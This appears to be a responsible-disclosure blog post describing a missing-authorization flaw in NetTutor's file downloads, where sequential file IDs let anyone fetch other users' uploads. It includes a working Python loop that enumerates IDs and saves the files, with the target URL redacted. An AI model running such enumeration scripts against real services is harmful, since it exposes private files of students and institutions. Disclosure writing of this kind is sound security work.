In December 2023, I identified a significant security vulnerability within NetTutor, a Link-Systems International, Inc service. This vulnerability posed a risk to the privacy and security of users across various educational institutions.

The Vulnerability Explained

NetTutor’s system lacked proper authentication checks for file downloads. This meant that any user could potentially access and download files uploaded by others without permission. These files could belong to individuals from different schools, institutions or paying users.

The Technical Flaw

The specific flaw was with the file signature verification process. NetTutor did not adequately ensure that the person attempting to download a file was authorized to do so. Furthermore, the file IDs were sequentially numbered and incremented by 2, making it easy to predict and access the next file in the sequence.

Demonstrating the Issue

To illustrate the ease of exploiting this vulnerability, I wrote a Python script that automated downloading files using their IDs. The script utilized a simple loop and the requests library to send GET requests to the server, attempting to download files by incrementing the file ID each time.

import requests
import time

# Initial file ID to start with
# PID is the file ID
pid = [REDACTED]

while True:
    url = f"[REDACTED]?id=l&db=[REDACTED]&todo=file&pid={pid}"
    print(f"Trying GET request to: {url}")

    try:
        # Send a GET request to the server
        response = requests.get(url, allow_redirects=True)
        response.raise_for_status()

        # Check for 'Content-Disposition' in the response headers
        content_disposition = response.headers.get('content-disposition')
        if content_disposition:
            # Extract the filename from the 'Content-Disposition' header
            filename = content_disposition.split('filename=')[1]
            if filename != '[REDACTED]':
                # Write the file content to a local file
                open(f"{pid} - {filename}", 'wb').write(response.content)
                # Increment the file ID by 2
                pid += 2
            else:
                print("File name is '[REDACTED]', trying again...")
        else:
            print("No 'Content-Disposition' in headers, trying again...")

    except requests.HTTPError as http_err:
        print(f"HTTP error occurred: {http_err}")
    except Exception as err:
        print(f"An error occurred: {err}")

    # Wait before the next request
    time.sleep([REDACTED])

⚠️ This script was used to demonstrate the vulnerability. The downloaded content was not viewed and was promptly destroyed. ⚠️

Responsible Disclosure and Swift Action

After discovering this vulnerability, I responsibly reported it to Link-Systems International, Inc. The company quickly addressed the issue, implementing a fix to prevent unauthorized file access. This prompt response helped to secure the platform and protect the data of its users.